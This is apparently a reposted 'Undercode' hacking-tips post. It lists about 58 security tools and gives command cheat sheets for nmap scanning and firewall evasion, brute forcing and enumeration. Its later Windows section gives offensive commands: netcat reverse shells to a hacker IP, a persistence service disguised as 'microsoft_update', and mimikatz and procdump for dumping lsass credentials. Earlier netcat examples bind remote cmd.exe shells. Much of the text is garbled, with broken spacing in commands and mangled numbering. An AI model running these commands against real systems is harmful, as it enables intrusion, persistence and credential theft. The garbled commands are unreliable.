🦑 MORE THAN 50 DIFFERENT HACKING TIP-OR TOOL + USAGE BY UNDERCODE 😁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) Nessus is the main tool for scanning UNIX vulnerabilities, and then lives in Windows. The main functions include local and remote security review, support client / server structure, with GTK graphical interface, and support scripting language to write plug-ins. It is free and open source.

2) Second, Wireshark Speaking of Wireshark, I have to mention Ethereal, Ethereal and Windows' sniffer pro and call the network sniffer tool two heroes, but unlike sniffer pro, Ethereal is more widely used in Linux-based systems. Wireshark is the follow-up version of Ethereal. It is the latest network sniffer software launched after Ethereal was acquired. It is a powerful network data capture tool that can analyze network data traffic and find worms, Trojan horses, and ARP spoofs in the first place. The root of the problem.

3) Snort Snort is free and cross-platform, used as a sniffer, log record, and intrusion detector for monitoring small TCP / IP networks. Can run linux / UNIX and Win, snort has three working modes: sniffer, packet recorder, network intrusion detection system.

In the sniffer mode, snort reads packets from the network and displays them on the console. For example, to print TCP / IP packet header information on the screen, you need to enter the command: snort -v

🦑4) Netcat
netcat is known as the 'Swiss Army Knife', a simple and useful tool that reads and writes through a network connection using TCP or UDP protocol data. It is designed as a stable backdoor tool and a powerful network debugging and detection tool.


1) Example: Command to connect to the TCP80 port of 192.168.xx: nc -nvv 192.168.xx 80

2) Monitor the TCP80 port of the machine: nc -l -p 80

3) Scan all ports from 192.168.xx TCP80 to TCP445 : Nc -nvv -w2 -z 192.168.xx 80-445

4) CMDSHELL bound to REMOTE host is bound to SHELL on TCP5354 port of REMOTE host REMOTE host is bound to: nc -l -p 5354 -t -ec: \ winnt \ system32 \ cmd.exe

5) REMOTE host binds SHELL and connects in reverse, for example: command to bind CMDSHELL of REMOTE host and connect to TCP5354 port of 192.168.xx in reverse: nc -t -ec: \ winnt \ system32 \ cmd exe 192.168.xx 5354

6) Used as an attack program, for example: connect to port 80 of 192.168.xx and send 'c: \ exploit.txt' content in its pipeline:
format 1: type.exe c: \ exploit. txt | nc -nvv 192.168.xx 80
format 2: nc -nvv 192.168.xx 80 <c: \ exploit.txt

7) Used as a honeypot, for example: use '-L' (note that L is uppercase) can continue to listen to a certain port until ctrl + c
Format: nc -L -p 80

🦑 Metasploit Framework

> is a writing, A perfect environment for testing and using exploit code. This environment provides a reliable platform for penetration testing, shellcode writing, and vulnerability research. This framework is mainly written in the object-oriented Perl programming language, with optional components written in C, assembler, and Python. As an auxiliary tool for buffer overflow testing, Metasploit Framework can also be said to be a vulnerability exploitation and testing platform. It integrates common overflow vulnerabilities and popular shellcodes on various platforms, and is constantly updated, making buffer overflow testing convenient and simple.

6) Hping2
Hping2: A network detection tool, a super variant of ping, this gadget can send custom ICMP, UDP and TCP data packets, and receive all feedback information. For example, you can set the time interval, the frequency of data packets sent (-i uX X is microseconds), the command is: hping2 192.168.0.1 -c 2 -i u1000

7) Kismet
Kismet is a Linux-based wireless network scanner, a very convenient tool to find the target WLAN by measuring the surrounding wireless signals. When Kismet starts to run, it will show that it has found all wireless LANs in this area. The SSID value of the AP in the WLAN is displayed in the "Name" column. In a row, the value of the CH column (channel used by the AP) should be the same as the one noted at the beginning. The information displayed on the far right of the window is the number of WLANs discovered by Kismet, the number of data packets that have been captured, the number of data packets that have been encrypted, and so on. Even when the target computer is turned off, Kismet can detect packets from our target AP. This is because the target AP keeps sending out "beacons", it will tell the computer with a wireless network card that there is an AP in Within this range.

8) Tcpdump TcpDump
based on Linux can completely intercept the "header" of the data packets transmitted in the network to provide analysis. It supports filtering for network layer, protocol, host, network or port, and provides logical statements such as and, or, not to help you remove useless information. tcpdump is a free network analysis tool, especially it provides source code and exposes interfaces, so it has strong scalability and is a very useful tool for network maintenance and intruders.

9) Cain and Abel
It is a password recovery tool under Windows platform. It recovers multiple passwords by using various methods, including: sniffing the network, using dictionary, brute force, and password analysis methods to crack the decrypted password, record the VoIP session, decode the promiscuous password, recover the wireless network key, and reveal the password box Enter the password (view with an asterisk) to disclose the buffered password and analyze the routing protocol. This tool does not take advantage of any software vulnerabilities or flaws. It takes advantage of the security problems and inherent weaknesses of the protocol standards, authentication methods, and buffering mechanisms themselves. Its main purpose is to simply recover passwords and credentials for various programs. The software consists of two parts: Cain and Abel. Cain (Cain.exe) is the main graphical interface of the program. Abel is a Windows service consisting of the files Abel.exe and Abel.dll.

10) John the Ripper is
a cracking password software used to try to crack the plain text when the cipher text is known. The latest version is currently version 1.4 of JOHN, which mainly supports the cracking of ciphertexts with DES and MD5 encryption methods. It can work on many different models and many different operating systems.

11) Ettercap
Ettercap was originally designed to exchange sniffers on the Internet, but as it developed, it gained more and more functions and became an effective and flexible intermediary attack tool. It supports active and passive protocol analysis and contains many network and host characteristics (such as OS fingerprint, etc.) analysis. Ettercap has 5 kinds of sniffing working methods:

(1) IPBASED: Sniffing mode based on IP address, Ettercap captures data packets based on source IP-PORT and destination IP-PORT.
|
(2) MACBASED: Based on the MAC address, Ettercap will capture packets based on the source MAC and destination MAC.

(3) ARPBASED: Based on ARP spoofing, Ettercap uses ARP spoofing to monitor the communication between two hosts (full duplex) in the switched LAN.

(4) SMARTARP: In the SMARTARP mode, Ettercap uses ARP spoofing to monitor the communication (full duplex) between a certain host on the switching network and all known other hosts (hosts in the host table).

(5) PUBLICARP: In PUBLICARP mode, Ettercap uses ARP spoofing to monitor the communication between a host on the switching network and all other hosts (half-duplex).

12) Nikto
Nikto is an open source, powerful WEB scanning evaluation software, a scanning software that can test various security projects of web servers, and can scan more than 2,600 potential hazards on more than 230 servers File, CGI and other problems, it can scan the WEB type, host name, specific directory, COOKIE, specific CGI vulnerability of the specified host, return http mode allowed by the host and so on. It also uses the LibWhiske library, but it is usually updated more frequently than Whisker. Nikto is one of the necessary web audit tools for network security personnel.

13) Ping / telnet / dig / traceroute / whois / netstat: the most basic security command.

14) OpenSSH / PuTTY / SSH
SSH (Secure Shell) is now commonly used to log in to remote computers or execute commands on them. Provide secure encryption for communication between two untrusted computers on an unsecured network, instead of very unreliable telnet / rlogin / rsh interactive content. Most unix uses the open source OpenSSH server and client program. Windows users prefer the free PuTTY client, which can also run on a variety of mobile devices. Some windows users like to use Cygwin, a terminal-based OpenSSH emulation program.

15) THC Hydra
If someone needs to brute force a remote authentication service, Hydra is often the object of choice. It can simultaneously perform quick dictionary-based cracking on more than 30 ports, including telnet, ftp, http, https, smb, multiple databases, and other services. Like THC Amap, Hydra comes from the private organization THC.

16) Paros proxy
proxy is installed between the attacker ’s browser and the target website, and all requests and responses will be sent, so that the hacker can carefully study these packet information, including the variables transmitted in the web page You can modify these variables before sending them out. The proxy is fully functional and has the ability to scan and detect weak points on the website. It can detect some common web application attacks and even detect unsafe web components.

17) Dsniff
Dsniff is an advanced password sniffer. It is the first monitoring tool that extends the traditional Sniffer concept, injects manufactured data packets into the network, and redirects communication data to the attacker's machine. In this way, Dsniff allows the attacker to eavesdrop on the data in the network of the exchange environment. Even if the attacker and the attack target are not in the same Lan, the attacker can collect the desired data. Support telnet, ftp, smtp, pop, imap, http application protocol. 18. NetStumbler

18) NetStumbler is a tool dedicated to finding wireless APs and is currently the most popular wireless search tool. When it is turned on, it can automatically display the wireless APs detected nearby, and can display the SSID, MAC address, frequency band, speed, encryption, etc. of these wireless APs. It is worth mentioning that NetStumbler can display wireless APs with hidden SSIDs set. In the software interface, you can see that the green light of the AP is constantly blinking. The wireless APs detected in each frequency band are listed in the tree structure. As NetStumbler conducts a full scan, nearby wireless APs will be unobstructed. Because it was developed by Americans, it can only detect 11 frequency bands between 1-11, while the domestic wireless frequency band is divided into 13 frequency bands, and wireless APs in the 12-13 frequency band will not be able to search.

19) THC Amap

It can detect what program is listening on a certain port. Because of its unique version detection feature, its database will not become as large as Nmap. You can consider using it when Nmap detects a service failure or other software does not work. Another feature of Amap is its ability to parse Nmap output files. This is another valuable tool contributed by THC.

20) The three main problems of GFI LANguard enterprise network vulnerability management: network scanning, network audit and patch management. GFI LANguard Network Security Scanner (NSS) is an award-winning solution that scans, detects, evaluates and repairs any security vulnerabilities in the network. As an administrator, you often need to deal with various issues, and sometimes use multiple products to deal with issues related to network vulnerabilities, patch management, and network audits. With GFI LANguard NSS, the three major issues of vulnerability management can be solved through a single control panel with rich reporting capabilities.

21) Aircrack
Aircrack is a set of tools for cracking 8WEP and WPA, generally used for key cracking of wireless networks, thereby illegally entering unauthorized wireless networks. As long as enough encrypted data packets are collected, it can be used to crack the WEP key of 40 to 512 bits, and can also crack the WPA1 or 2 network through advanced encryption methods or brute force cracking.

22) Superscan
SuperScan is a free tool developed by Foundstone, but a very powerful tool. Compared with many similar tools, it is both a hacking tool and a network security tool. A hacker can use its denial of service attack (DoS, denial of service) to collect remote network host information. As a security tool, SuperScan can help you discover weaknesses in your network.
Two, three, Netfilter

🦑 In layman's terms, the architecture of netfilter is to place some detection points (HOOK) at several positions in the entire network process, and register some processing functions on each detection point for processing (such as packet filtering, NAT, etc., or even User-defined functions).
Twenty-four, Sysinternals

Sysinternals belongs to a set of security management suites, mainly including:

(1) Process Explorer: process management tool, can be set to completely replace the system's own task manager taskmgr, become the default "task manager". The various monitors inside monitor or record the current state of the system very intuitively, and the ease of use is very high. Support XP and Win2003 above systems.

(2) PsTools: It consists of 12 commands in total and can be used to remotely manage Windows NT / 2000 / XP systems. You can remotely organize the hard disk, close the messenger service running on the remote computer, view the server hard disk space, view the process on the remote computer, and end the suspicious process, send messages, and quickly shut down the remote computer.

(3) Autoruns: powerful and complete startup item scanning tool!

(4) TCPView: Port detection software, very small and easy to use.

(5) RootkitRevealer: It can be used to detect whether the rootkit is running in the Windows system of the system. It can detect all rootkits published by www.rootkit.com , including AFX, Vanquish, HackerDefender, etc. by analyzing the differences between the registry and system API files Note: RootkitRevealer cannot detect rootkits without hidden files and registry, such as FU_Rootkit).

25) Retina
Retina has been regarded as the most accurate non-embedded network security scanner in the industry. It contains the most comprehensive security vulnerability database maintained by eEye's research and development team. As a professional security software for both distributed enterprise users and users in a stand-alone network environment, Retina has been used by many of the world's largest companies and government departments. They are used to detect the network security of various branches / head offices / government departments, and correct hidden vulnerabilities and insecure settings in the network.

27) Perl / Python / Ruby
perl is older than ruby ​​or python. Perl was once the most popular scripting language, and was once considered a must for hackers. You can complete complex data processing with just a few lines, and the speed does not have to be much slower. The built-in support for regular expressions and data structures is even more amazing. Many websites used to be written in perl. Even now, some older foreign websites still have some perl codes. The most powerful thing about perl is that it has countless library support. However, perl has the largest community in the world, and you can find the corresponding library for anything you want. But the shortcomings of perl are also obvious: perl's program is too flexible, there are usually many solutions to a problem, just as there are many sayings in one sentence, and the syntax of perl is completely heavenly for people who are not familiar with it. . Ruby and Python both appeared as replacements for perl. The latest perl adds object-oriented support, and ruby ​​and python have better object-oriented support (even better than java).

27) L0phtcrack
L0phtCrack v5.04, referred to as LC 5, is an essential tool for network administrators. It can be used to detect whether Windows and UNIX users have used unsafe passwords. Win NT / 2000 / XP / UNIX administrator account password cracking tool. Facts have proved that simple or easily cracked administrator passwords are one of the biggest security threats, because attackers often log on to computer systems as legitimate without being noticed.

28) Scapy
Scapy is a powerful interactive packet processing tool, packet generator, network scanner, network discovery tool and packet sniffer tool. It provides a variety of functions for interactively generating data packets or data packet collections, manipulating data packets, sending data packets, packet sniffing, response and feedback matching, and so on.
Twenty-nine, Sam Spade
SamSpade provides a friendly GUI interface, can easily complete a variety of network query tasks, it was originally developed to track down spammers, but can also be used for a large number of other network detection, network management Security-related tasks, including ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search and other tools, is an integrated toolbox

30) GnuPG / PGP
With the development of network and computer technology, the security of data storage and data exchange has become more and more important, and encryption technology has been used for data storage and data exchange for a long time. In order to ensure the correctness of the two parties' identity during network data exchange, the visa system has also matured. GnuPG is a set of tools for encrypting data and making certificates. Its function is similar to PGP. But PGP uses many patented algorithms.

31)
The Airsnort program uses the shortcomings of the widely used network encryption system "Wi-fi" (or 802.11b) designed according to general standards to enter the network, but another encryption system has not been broken by AirSnort or WEPCrack . The people who designed AirSnort believe that many Internet users do not value or cannot understand the flaws in the Wi-fi encryption system.

32) BackTrack
BackTrack is a self-starting CD based on Slackware and SLAX. It contains a set of security and computer forensics tools. It was actually created by the fusion of Auditor Security Linux and WHAX (formerly Whoppix).
33. P0f
p0f is another passive discrimination tool for remote operating systems after Nmap and Xprobe2. It supports: reverse connection SYN mode, forward connection SYN + ACK mode, empty connection RST + mode, fragmentation ACK mode. It can also detect: whether it is running behind a firewall, whether it is running in NAT mode, whether it is running in load balancing mode, the time the remote system has started, the DSL and ISP information of the remote system, etc.


34) Google: a popular search engine.

35) WebScarab is
a proxy software including proxy, web crawling, web spider, session analysis, automatic script interface, fuzzing tool, encoding / decoding of all popular formats, service description language and parser.


36) Ntop
NTOP can associate the port usage with the application, which is similar to the "netstat -an" command, and can display detailed information such as port opening time and port traffic. For example, you can associate the open TCP / UDP port with the application program.

37) Tripwire
is currently the most famous software tool for file system integrity check under unix. The core of the technology used in this software is to generate a digital signature for each file to be monitored and keep it. When the current digital signature of the file is inconsistent with the retained digital signature, then the file must have been modified now.

38) Ngrep
rep is an online version of grep (a tool to search for strings in text), and strives for more grep features to search for specified packets. Because libpcap library is required to install ngrep, it supports a large number of operating systems and network protocols. Can identify TCP, UDP and ICMP packets, understand the filtering mechanism of bpf.

39) Nbtscan is
a small tool to scan the NetBIOS information of WINDOWS network, but it can only be used in the local area network, it can display IP, host name, user name and MAC address and so on.

40 ) WebInspect
is considered to be the next-generation Web application security testing tool. The main functions are introduced: (1) use innovative evaluation technology to check the security of Web services and Web applications; Evaluation; (3) Perform application security testing and collaboration throughout the lifecycle; (4) Easily run interactive scans through the most advanced user interface; (5) Use advanced tools (HP Security Toolkit) to perform penetration tests; (6 ) Configured to support any web application environment.

41) OpenSSL
SSL is the abbreviation of Secure Socket Layer (Secure Socket Layer Protocol) and can provide secret transmission on the Internet. The entire OpenSSL software package can be divided into three main functional parts: cryptographic algorithm library, SSL protocol library and application program.

🦑No one allowed to clone our tutorials

42) Xprobe2
Xprobe2 actively detects the characteristics of the ICMP datagram corresponding to the datagram through fuzzy matrix statistical analysis, and then detects the type of the remote operating system.

43() EtherApe
The network sniffer can perform the same functions as Tcpdump, but the operationwritten by undercode interface is much more friendly. Both Ehtereal and Tcpdump rely on the pcap library (libpcap), so the two are very similar in many ways (for example, they use the same filtering rules and keywords). Ethereal uses the same as other graphical network sniffer.
Fourth, Core Impact is
recognized as the strongest vulnerability detection tool, comprehensive assessment and detection, prevention and response to information security threats. By safely replicating real-world attacks on network servers and workstations, end-user systems, and web applications, you can assist in finding and fixing security issues.

45) IDA Pro
is an interactive "analyst". However, it does not automatically solve problems. IDA Pro will find suspicious instructions and will not solve these problems. Your job is to inform IDA how to do it.

46) ​​SolarWinds is
a professional network management software that can monitor and discover network devices. The following tools are included:

1) Network Performance Monitoring: Bandwidth measurement, routing CPU load, bandwidth monitoring, CPU measurement, network performance monitor, SNMP image and advanced CPU upload.

2) Network Discovery: List of subnets, Ping Sweep, and IP web browser, DNS verification, IP address management, MAC address discovery, SNMP Sweep, network positioning

3) Tools for Cisco networks: IP web browser, routing CPU load, configuration download, configuration upload, configuration editor / browser, proxy ping, comparative running VS startup configuration, router password encryption, CPU measurement And advanced CPU upload

4) Network monitoring: Watch It !, network monitor, Syslog server, routing CPU load, advanced ping and network performance monitor.

5) IP Address Management: Advanced subnet calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS verification, IP address management, Ping Sweep.

6) Security (Security): routing security check, TCP Reset, dictionary editor, SNMP Brute Force attack, SNMP dictionary attack, router password encryption.

7) Ping & Diagnostic: ping, advanced ping, Trace Route, Proxy Ping, Ping Sweep.

8) MIB browser: MIB Walk, update system MIBs, MIB browser, MIB browser and SNMP images.

9) Others: TFTP server, WAN Killer, Wake-On-Line.

47) Pwdump: a tool for grabbing password files of Windows users.
Forty-eight, LSoF
full name list opened files, which is to list the files that have been opened in the system. We know that everything in the Linux environment is a file, the device is a file, the directory is a file, and even sockets are files. Therefore, using the lsof command is very helpful for daily Linux management.

49) RainbowCrack is
a multi-functional password cracking software, which not only can crack passwords, but also is a cracking tool for messy algorithm encryption. For example, it can crack im, md5, sha1, customizable, etc., other encryption methods can also be added to the software. The software supports both Windows and Linux systems, and the forms generated on one system can be directly converted to another system for use. Although it is powerful, it is more complicated to use.


50) Firewalk
Linux network security tools use similar traceroute technology to analyze IP packet responses to determine gateway access control lists and tools for drawing network graphs.


51) An
easy-to-use IP and port scanning tool for Angry IP Scanner , which can obtain the ping response time, host name, computer name, workgroup, login user name, MAC address, TTL, NetBios information of the scanned computer, etc. You can specify the scan port to view the open port of the target computer; for the active host, you can perform operations such as opening in the resource manager, browsing with a web browser, FTP, telnet, ping, tracert or using the web page to find the geographic location of the specified IP . With just a web address or host name, Angry IP Scanner can automatically resolve its IP address and scan it. Angry IP Scanner also supports automatic selection and scanning of entire Class B and Class C IP segments, collection and management of commonly used IPs, and export of scan results to multiple file formats. Due to the multi-threaded scanning, Angry IP Scanner can scan dozens of IPs at the same time, so it is extremely fast.


52) RKHunter's
Chinese name "Rootkit Hunter" can find about 58 known rootkits and some sniffer and backdoor programs. It performs a series of test scripts to confirm whether the machine has been infected with rootkits.


53) Ike-scan is
a tool for detecting the transmission characteristics of IKE (Internet Key Exchange) service. IKE is a mechanism for establishing a connection between a server and a remote client in a VPN network. After the IP address of the VPN server is scanned, the reconstructed IKE data packet is distributed to each host in the VPN network. As long as the host running IKE will send back feedback to confirm its existence. The tool then records and displays these feedback packets and compares them with a series of known VPN product fingerprints.


54) Arpwatch
ARP (Address Resolution Protocol) is a protocol used to resolve IP and hardware addresses of network devices. Under Linux system, arpwatch can monitor and record ARP packets in the regional network, and report the monitored changes through E-mail.


55) KisMAC is
a free wireless protocol sniffing program that can be used in Mac OX operating system. The KisMAC application does not securely change file permissions during installation. Local attackers can use this vulnerability to gain unauthorized access to sensitive file information.

56) OSSEC HIDS is
an open source intrusion detection system, including log analysis, comprehensive detection, rook-kit detection. As a HIDS, OSSEC should be installed in a monitoring system. In addition, sometimes it is not necessary to install the full version of OSSEC. If multiple computers are installed with OSSEC, you can use the client / server mode to run. The client sends the data back to the server for analysis through the client program. Monitoring multiple systems on one computer is quite economical and practical for business or home users. The biggest advantage of OSSEC is that it can run on almost any operating system, such as Windows, Linux, OpenBSD / FreeBSD and MacOS. However, clients running on Windows cannot implement root-kit detection, and clients on other systems have no problems.


57) Openbsd PF
OpenBSD users love to use PF, which is their firewall tool. Functions include network address translation, management of TCP / IP communications, bandwidth control, and packet grading control. It also has some additional features, such as passive operating system detection. PF was written by the same people who wrote OpenBSD, and it has been well evaluated, designed, and coded to avoid exposing similar vulnerabilities in other packet filters.


58) Nemesis: It can be used to construct almost any type of ICMP packet.


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 57 MOST DANGEROUS TOOLS TESTED- Use for secure not for harm 👿

#SUPPORT & SHARE

T.me/UndercodeTesting

🦑 Collection of practical skills of penetration testing Fast tips @undercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best NMAP scanning strategy


# The best nmap scanning strategy for all sizes of networks # Host discovery, generating a list of live hosts $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24


> $ grep "Status: Up" Discovery. gnmap | cut -f 2 -d '' > LiveHosts.txt # Port discovery, found most commonly used ports # https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4- Pn -oG TopTCP -iL LiveHosts.txt

> $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt

> $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # port discovery , Found all ports, but the scanning of UDP ports will be very slow $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt

> $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # Display TCP \ UDP port $ grep"open" FullTCP | cut -f 1 -d '' | sort -nu | cut -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{print "T:" $ 0} ' $ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d ' / ' | xargs | sed ' s / /, / g ' | awk ' {print "U: "$ 0} '

# Detect service version $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # Scan system scan $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # System and service Detect $ nmap -O -sV -T4 -Pn -p U: 53,111,137, T: 21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts. txt

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Nmap Perform web vulnerability scanning
fb.com/undercodeTesting


> cd / usr / share / nmap / scripts /

> wget https://nmap down> from git or site

> nmap_nse_vulscan-2.0.tar.gz&& tar xzf nmap_nse_vulscan-2.0.tar.gz

> nmap -sS -sV --script = vulscan / vulscan.nse target

> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv target

> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv -p80 target

> nmap -PN -sS -sV --script = vulscan --script-args vulscancorrelation = 1 -p80 target

> nmap -sV --script = vuln target
nmap -PN -sS -sV --script = all --script-args vulscancorrelation = 1 target


🦑 use DIRB blasting directory

Note: DIRB is a tool dedicated to blasting directories, which has been installed by default in Kali, Similar tools include foreign patator , dirsearch , DirBuster , domestic sword and so on.

> dirb http: / / IP: PORT / usr/ share / dirb / wordlists / common .txt

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Nmap – avoid firewall :

# segment

> $ nmap -f# Modify the default MTU size, but it must be a multiple of 8 (8, 16, 24, 32, etc.)

> $ nmap --mtu 24 # Generate a random amount of spoofing

> $ nmap -D RND: 10 [target] # Manually specify the use of spoofing IP

> $ nmap -D decoy1, decoy2, decoy3 etc. # botnet scan, first need to find the botnet's IP

> $ nmap -sI [Zombie IP] [Target IP] # specify the source port number $ nmap --source-port 80 IP # Append a random amount of data after each scanned data packet

> $ nmap --data-length 25 IP # MAC address spoofing can generate MAC addresses of different hosts $ nmap --spoof-mac Dell / Apple / 3 Com IP

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 nmap Pratical tips by Undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑More Pratical hacking tips by undercode:
t.me/undercodeTesting


🦑 Patator – all-around brute force testing tool


# git clone https://github.com/lanjelot/patator.git / usr / share / patator # SMTP blast

$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst
$ patator smtp_login host = 192.168 . 17.129 user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst

$ patator smtp_login host =192.168 . 17.129 helo = 'ehlo 192.168.17.128' user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst

$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst -x ignore: fgrep = 'incorrect password or account name'


🦑 Use Fierce to blast DNS

Note: Fierce will check whether the DNS server allows zone transfer. If allowed, zone transfer will be performed and the user will be notified. If not allowed, the host name can be enumerated by querying the DNS server. Similar tools: subDomainsBrute andSubBrute etc.

# https://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt


use Nikto scan Web Services


Nikto - C all -h https: // IPScan


🦑WordPress


git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url https: // IP / --enumerate p


🦑HTTP fingerprint recognition


wget http: / /www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301 / linux / ./httprint -h http: // IP -s signatures.txt


scan with Skipfish

Note: Skipfish is a web application security investigation tool. Skipfish will use recursive crawlers and dictionary-based probes to generate an interactive website map. The resulting map will be output after passing security checks.

skipfish -m 5 -LY -S / usr / share / skipfish / dictionaries / complete.wl -o ./skipfish2 -u http: // IP


🦑uses NC to scan


nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56. $ I 21-25 -z; done


🦑Unicornscan

Note: Unicornscan is a tool for information collection and security audit.

us -H -msf -Iv 192 .168 .56 .101 -p 1 -65535 us -H -mU -Iv 192 .168 .56 .101 -p . 1 -65535 -H resolve the host name in the report generation stage -m scan type ( SF - TCP , the U- - UDP ) -Iv - detail


using the operating system fingerprint identification Xprobe2


Xprobe2 -v - p tcp : 80 : open IP


🦑enumeration Samba


nmblookup -A target
smbclient // MOUNT / share -I target -N rpcclient -U "" target
enum4linux target


🦑enumeration SNMP


snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP


practical Windows cmd command


net localgroup Users
net localgroup Administrators
search dir / s * .doc system ( "start cmd.exe / k $ cmd" )
sc create microsoft_update binpath = "cmd / K start c: \ nc.exe -d ip-of-hacker port -e cmd.exe" start = auto error = ignore
/ c C: \ nc.exe -ec: \ windows \ system32 \ cmd.exe -vv 23.92 . 17.103 7779 mimikatz.exe "privilege :: debug" "log" "sekurlsa :: logonpasswords"Procdump.exe -accepteula- ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa :: minidump lsass.dmp" "log" "sekurlsa :: logonpasswords" C: \ temp \ procdump.exe -accepteula- ma lsass.exe lsass .dmp 32 -bit system
C: \ temp \ procdump.exe -accepteula- 64 - ma lsass.exe lsass.dmp 64 -bit system


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁